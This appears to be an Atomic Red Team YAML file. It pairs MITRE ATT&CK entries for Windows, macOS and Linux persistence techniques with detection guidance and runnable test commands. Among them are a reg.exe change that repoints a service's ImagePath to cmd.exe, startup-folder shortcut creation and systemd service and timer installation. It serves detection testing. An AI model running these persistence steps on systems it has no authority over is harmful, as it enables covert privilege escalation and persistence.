x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. - - Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. 
- x_mitre_data_sources: - - Windows Registry - - Services - - Process command-line parameters - x_mitre_contributors: - - Travis Smith, Tripwire - - Matthew Demaske, Adaptforward - x_mitre_platforms: - - Windows - identifier: T1574.011 - atomic_tests: - - name: Service Registry Permissions Weakness - auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - description: | - Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. - reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" - supported_platforms: - - windows - input_arguments: - weak_service_name: - description: weak service check - type: String - default: weakservicename - executor: - command: | - get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL - get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL - name: powershell - - name: Service ImagePath Change with reg.exe - auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 - description: 'Change Service registry ImagePath of a bengin service to a malicious - file - -' - supported_platforms: - - windows - input_arguments: - weak_service_name: - description: weak service name - type: String - default: calcservice - weak_service_path: - description: weak service path - type: String - default: "%windir%\\system32\\win32calc.exe" - malicious_service_path: - description: malicious service path - type: String - default: "%windir%\\system32\\cmd.exe" - dependency_executor_name: powershell - dependencies: - - description: 'The service must exist (#{weak_service_name}) - -' - prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit - 1} - -' - get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - -' - executor: - command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" - /f /v ImagePath /d "#{malicious_service_path}" - -' - 
cleanup_command: 'sc.exe delete #{weak_service_name} - -' - name: command_prompt - T1547.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.009 - url: https://attack.mitre.org/techniques/T1547/009 - - external_id: CAPEC-132 - source_name: capec - url: https://capec.mitre.org/data/definitions/132.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Shortcut Modification - description: |- - Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. - - Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. - id: attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T17:21:27.487Z' - created: '2020-01-24T19:00:32.917Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Since a shortcut's target path likely will not change, modifications - to shortcut files that do not correlate with known software changes, patches, - removal, etc., may be suspicious. 
Analysis should attempt to relate shortcut - file change or creation events to other potentially suspicious events based - on known adversary behavior such as process launches of unknown executables - that make network connections. - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_contributors: - - Travis Smith, Tripwire - x_mitre_platforms: - - Windows - identifier: T1547.009 - atomic_tests: - - name: Shortcut Modification - auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce - description: | - This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; - gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. - Upon execution, calc.exe will be launched. - supported_platforms: - - windows - input_arguments: - shortcut_file_path: - description: shortcut modified and execute - type: path - default: "%temp%\\T1547.009_modified_shortcut.url" - executor: - command: | - echo [InternetShortcut] > #{shortcut_file_path} - echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} - #{shortcut_file_path} - cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - -' - name: command_prompt - - name: Create shortcut to cmd in startup folders - auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 - description: | - LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" - to view the new shortcut. 
- supported_platforms: - - windows - executor: - command: | - $Shell = New-Object -ComObject ("WScript.Shell") - $ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") - $ShortCut.TargetPath="cmd.exe" - $ShortCut.WorkingDirectory = "C:\Windows\System32"; - $ShortCut.WindowStyle = 1; - $ShortCut.Description = "T1547.009."; - $ShortCut.Save() - - $Shell = New-Object -ComObject ("WScript.Shell") - $ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") - $ShortCut.TargetPath="cmd.exe" - $ShortCut.WorkingDirectory = "C:\Windows\System32"; - $ShortCut.WindowStyle = 1; - $ShortCut.Description = "T1547.009."; - $ShortCut.Save() - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore - Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore - name: powershell - elevation_required: true - T1037.005: - technique: - id: attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f - description: "Adversaries may use startup items automatically executed at boot - initialization to establish persistence. Startup items execute during the - final phase of the boot process and contain shell scripts or other executable - files along with configuration information used by the system to determine - the execution order for all startup items. (Citation: Startup Items)\n\nThis - is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), - and thus the appropriate folder, /Library/StartupItems isn’t - guaranteed to exist on the system by default, but does appear to exist by - default on macOS Sierra. A startup item is a directory whose executable and - configuration property list (plist), StartupParameters.plist, - reside in the top-level directory. 
\n\nAn adversary can create the appropriate - folders/files in the StartupItems directory to register their own persistence - mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since - StartupItems run during the bootup phase of macOS, they will run as the elevated - root user." - name: Startup Items - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.005 - url: https://attack.mitre.org/techniques/T1037/005 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html - description: Apple. (2016, September 13). Startup Items. Retrieved July 11, - 2017. - source_name: Startup Items - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:47:39.124Z' - created: '2020-01-15T18:00:33.603Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_detection: |- - The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. - - Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior. 
- x_mitre_permissions_required: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.005 - atomic_tests: - - name: Add file to Local Library StartupItems - auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 - description: | - Modify or create an file in /Library/StartupItems - - [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) - supported_platforms: - - macos - executor: - command: 'sudo touch /Library/StartupItems/EvilStartup.plist - -' - cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - -' - name: sh - elevation_required: true - T1542.001: - technique: - id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada - description: |- - Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI) - - System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect. - name: System Firmware - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1542.001 - url: https://attack.mitre.org/techniques/T1542/001 - - external_id: CAPEC-532 - source_name: capec - url: https://capec.mitre.org/data/definitions/532.html - - url: https://en.wikipedia.org/wiki/BIOS - description: Wikipedia. 
(n.d.). BIOS. Retrieved January 5, 2016. - source_name: Wikipedia BIOS - - url: https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface - description: Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. - Retrieved July 11, 2017. - source_name: Wikipedia UEFI - - url: http://www.uefi.org/about - description: UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016. - source_name: About UEFI - - url: http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research - description: Upham, K. (2014, March). Going Deep into the BIOS with MITRE - Firmware Security Research. Retrieved January 5, 2016. - source_name: MITRE Trustworthy Firmware Measurement - - url: http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about - description: 'Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions - about BIOS Security. Retrieved December 11, 2015.' - source_name: MITRE Copernicus - - url: https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/ - description: Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against - Vault 7 Disclosure Scanning. Retrieved March 13, 2017. - source_name: McAfee CHIPSEC Blog - - url: https://github.com/chipsec/chipsec - description: Intel. (2017, March 18). CHIPSEC Platform Security Assessment - Framework. Retrieved March 20, 2017. - source_name: Github CHIPSEC - - url: http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html - description: Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. - Retrieved March 20, 2017. 
- source_name: Intel HackingTeam UEFI Rootkit - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-05-19T21:22:37.865Z' - created: '2019-12-19T19:43:34.507Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Jean-Ian Boutin, ESET - - McAfee - - Ryan Becwar - x_mitre_data_sources: - - EFI - - BIOS - - API monitoring - x_mitre_detection: |- - System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. - - Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit) - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_defense_bypassed: - - Host intrusion prevention systems - - Anti-virus - - File monitoring - atomic_tests: [] - T1543.002: - technique: - id: attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b - description: "Adversaries may create or modify systemd services to repeatedly - execute malicious payloads as part of persistence. 
The systemd service manager - is commonly used for managing background daemon processes (also known as services) - and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: - Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization - (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, - CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit - and Upstart while remaining backwards compatible with the aforementioned init - systems.\n\nSystemd utilizes configuration files known as service units to - control how services boot and under what conditions. By default, these unit - files are stored in the /etc/systemd/system and /usr/lib/systemd/system - directories and have the file extension .service. Each service - unit file may contain numerous directives that can execute system commands:\n\n* - ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands - when a services is started manually by 'systemctl' or on system start if the - service is set to automatically start. \n* ExecReload directive covers when - a service restarts. 
\n* ExecStop and ExecStopPost directives cover when a - service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd - functionality to establish persistent access to victim systems by creating - and/or modifying service unit files that cause systemd to execute malicious - commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries - typically require root privileges to create/modify service unit files in the - /etc/systemd/system and /usr/lib/systemd/system - directories, low privilege users can create/modify service unit files in directories - such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: - Rapid7 Service Persistence 22JUNE2016)" - name: Systemd Service - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1543.002 - url: https://attack.mitre.org/techniques/T1543/002 - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - source_name: 'Linux man-pages: systemd January 2014' - url: http://man7.org/linux/man-pages/man1/systemd.1.html - description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. - Retrieved April 23, 2019. - - source_name: Freedesktop.org Linux systemd 29SEP2018 - url: https://www.freedesktop.org/wiki/Software/systemd/ - description: Freedesktop.org. (2018, September 29). systemd System and Service - Manager. Retrieved April 23, 2019. - - source_name: Anomali Rocke March 2019 - url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang - description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With - a New Malware Family Written in Golang. Retrieved April 24, 2019. 
- - source_name: Rapid7 Service Persistence 22JUNE2016 - url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence - description: Rapid7. (2016, June 22). Service Persistence. Retrieved April - 23, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T13:46:29.701Z' - created: '2020-01-17T16:15:19.870Z' - x_mitre_platforms: - - Linux - x_mitre_detection: |- - Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. - - Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables. - - Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution. - x_mitre_permissions_required: - - User - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.2' - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_contributors: - - Tony Lambert, Red Canary - identifier: T1543.002 - atomic_tests: - - name: Create Systemd Service - auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c - description: 'This test creates a Systemd service unit file and enables it as - a service. 
- -' - supported_platforms: - - linux - input_arguments: - systemd_service_path: - description: Path to systemd service unit file - type: Path - default: "/etc/systemd/system" - systemd_service_file: - description: File name of systemd service unit file - type: String - default: art-systemd-service.service - execstoppost_action: - description: ExecStopPost action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstoppost-marker" - execreload_action: - description: ExecReload action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execreload-marker" - execstart_action: - description: ExecStart action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstart-marker" - execstop_action: - description: ExecStop action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstop-marker" - execstartpre_action: - description: ExecStartPre action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstartpre-marker" - execstartpost_action: - description: ExecStartPost action for Systemd service - type: String - default: "/bin/touch /tmp/art-systemd-execstartpost-marker" - executor: - command: | - echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file} - echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file} - echo "" >> #{systemd_service_path}/#{systemd_service_file} - echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file} - echo "Type=simple" - echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "ExecStop=#{execstop_action}" >> 
#{systemd_service_path}/#{systemd_service_file} - echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file} - echo "" >> #{systemd_service_path}/#{systemd_service_file} - echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file} - echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file} - systemctl daemon-reload - systemctl enable #{systemd_service_file} - systemctl start #{systemd_service_file} - cleanup_command: | - systemctl stop #{systemd_service_file} - systemctl disable #{systemd_service_file} - rm -rf #{systemd_service_path}/#{systemd_service_file} - systemctl daemon-reload - name: bash - T1053.006: - technique: - id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 - description: |- - Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) - - Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. 
- - An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence. - name: Systemd Timers - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1053.006 - url: https://attack.mitre.org/techniques/T1053/006 - - source_name: archlinux Systemd Timers Aug 2020 - url: https://wiki.archlinux.org/index.php/Systemd/Timers - description: archlinux. (2020, August 11). systemd/Timers. Retrieved October - 12, 2020. - - source_name: 'Linux man-pages: systemd January 2014' - url: http://man7.org/linux/man-pages/man1/systemd.1.html - description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. - Retrieved April 23, 2019. - - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux - AUR Package Repository. Retrieved April 23, 2019. - url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ - source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 - - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public - Arch package compromise. Retrieved April 23, 2019. - url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a - source_name: gist Arch package compromise 10JUL2018 - - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved - April 23, 2019. 
- url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html - source_name: acroread package compromised Arch Linux Mail 8JUL2018 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-14T15:20:00.754Z' - created: '2020-10-12T17:50:31.584Z' - x_mitre_platforms: - - Linux - x_mitre_contributors: - - SarathKumar Rajendran, Trimble Inc - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: |- - Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. - - Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables. 
- - Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) - x_mitre_permissions_required: - - User - - root - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1053.006 - atomic_tests: - - name: Create Systemd Service and Timer - auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b - description: "This test creates Systemd service and timer then starts and enables - the Systemd timer \n" - supported_platforms: - - linux - input_arguments: - path_to_systemd_service: - description: Path to systemd service unit file - type: Path - default: "/etc/systemd/system/art-timer.service" - path_to_systemd_timer: - description: Path to service timer file - type: Path - default: "/etc/systemd/system/art-timer.timer" - systemd_service_name: - description: Name of systemd service - type: String - default: art-timer.service - systemd_timer_name: - description: Name of systemd service timer - type: String - default: art-timer.timer - executor: - command: | - echo "[Unit]" > #{path_to_systemd_service} - echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service} - echo "[Service]" >> #{path_to_systemd_service} - echo "Type=simple" >> #{path_to_systemd_service} - echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service} - echo "[Install]" >> #{path_to_systemd_service} - echo "WantedBy=multi-user.target" >> #{path_to_systemd_service} - echo "[Unit]" > #{path_to_systemd_timer} - echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer} - echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer} - echo "[Timer]" >> #{path_to_systemd_timer} - echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer} - echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer} - echo "[Install]" >> #{path_to_systemd_timer} - echo "WantedBy=timers.target" >> 
#{path_to_systemd_timer} - systemctl start #{systemd_timer_name} - systemctl enable #{systemd_timer_name} - systemctl daemon-reload - cleanup_command: | - systemctl stop #{systemd_timer_name} - systemctl disable #{systemd_timer_name} - rm #{path_to_systemd_service} - rm #{path_to_systemd_timer} - systemctl daemon-reload - name: bash - T1542.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1542.005 - url: https://attack.mitre.org/techniques/T1542/005 - - source_name: Cisco Blog Legacy Device Attacks - url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 - description: Omar Santos. (2020, October 19). Attackers Continue to Target - Legacy Devices. Retrieved October 20, 2020. - - source_name: Cisco IOS Software Integrity Assurance - Secure Boot - url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35 - description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure - Boot. Retrieved October 19, 2020. - - source_name: Cisco IOS Software Integrity Assurance - Image File Verification - url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 - description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco - IOS Image File Verification. Retrieved October 19, 2020. - - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification - url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 - description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco - IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. - - source_name: Cisco IOS Software Integrity Assurance - Command History - url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 - description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command - History. Retrieved October 21, 2020. 
- - source_name: Cisco IOS Software Integrity Assurance - Boot Information - url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26 - description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot - Information. Retrieved October 21, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: TFTP Boot - description: |- - Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. - - Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. 
(Citation: Cisco Blog Legacy Device Attacks) - id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-22T16:35:53.806Z' - created: '2020-10-20T00:06:56.180Z' - x_mitre_data_sources: - - Network device run-time memory - - Network device command history - - Network device configuration - - File monitoring - - Network device logs - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) - - Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols. 
- x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Network - atomic_tests: [] - T1547.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.003 - url: https://attack.mitre.org/techniques/T1547/003 - - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top - description: Microsoft. (2018, February 1). Windows Time Service (W32Time). - Retrieved March 26, 2018. - source_name: Microsoft W32Time Feb 2018 - - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx - description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. - source_name: Microsoft TimeProvider - - url: https://github.com/scottlundgren/w32time - description: Lundgren, S. (2017, October 28). w32time. Retrieved March 26, - 2018. - source_name: Github W32Time Oct 2017 - - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings - description: Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. - Retrieved March 26, 2018. - source_name: Microsoft W32Time May 2017 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Time Providers - description: |- - Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. 
